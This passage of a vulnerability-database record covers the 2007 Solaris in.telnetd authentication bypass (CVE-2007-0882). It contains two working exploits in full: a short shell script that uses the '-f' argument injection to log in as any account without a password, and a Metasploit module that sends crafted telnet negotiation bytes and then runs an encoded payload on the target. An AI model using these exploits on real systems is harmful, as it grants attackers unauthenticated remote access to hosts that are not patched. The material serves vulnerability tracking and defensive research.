Remote exploit for solaris platform", "modified": "2007-02-11T00:00:00", "published": "2007-02-11T00:00:00", "id": "EDB-ID:3293", "href": "https://www.exploit-db.com/exploits/3293/", "type": "exploitdb", "title": "SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit", "sourceData": "#!/bin/sh\r\n# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL\r\n#\r\n# *********************ATTENTION********************************\r\n# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES\r\n# (C) COPYRIGHT Kingcope, 2007\r\n#\r\n################################################################\r\necho \"\"\r\necho \"SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net\"\r\nif [ $# -ne 2 ]; then\r\necho \"./sunos <host> <account>\"\r\necho \"./sunos localhost bin\"\r\nexit\r\nfi\r\necho \"\"\r\necho \"ALEX ALEX\"\r\necho \"\"\r\ntelnet -l\"-f$2\" $1\r\n\r\n# milw0rm.com [2007-02-11]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3293/"}], "metasploit": [{"lastseen": "2019-11-26T14:03:20", "bulletinFamily": "exploit", "description": "This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.\n", "modified": "2017-09-08T01:18:50", "published": "2007-02-17T13:52:50", "id": "MSF:EXPLOIT/SOLARIS/TELNET/FUSER", "href": "", "type": "metasploit", "title": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\n 'Description' => %q{\n This module exploits the argument injection vulnerability\n in the 
telnet daemon (in.telnetd) of Solaris 10 and 11.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-0882' ],\n [ 'OSVDB', '31881'],\n [ 'BID', '22512' ],\n ],\n 'Privileged' => false,\n 'Platform' => %w{ solaris unix },\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => '',\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n },\n 'Targets' =>\n [\n ['Automatic', { }],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(23),\n OptString.new('USER', [ true, \"The username to use\", \"bin\" ]),\n ])\n end\n\n def exploit\n connect\n\n print_status('Setting USER environment variable...')\n\n req = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\"\n req << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\"\n req << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFC\\x25\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\"\n\n sock.put(req)\n sock.get_once\n\n req = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\"\n req << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\"\n req << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\"\n\n sock.put(req)\n sock.get_once\n select(nil,nil,nil,0.25)\n\n sock.put(\"nohup \" + payload.encoded + \" >/dev/null 2>&1\\n\")\n\n select(nil,nil,nil,0.25)\n\n handler\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/telnet/fuser.rb"}]}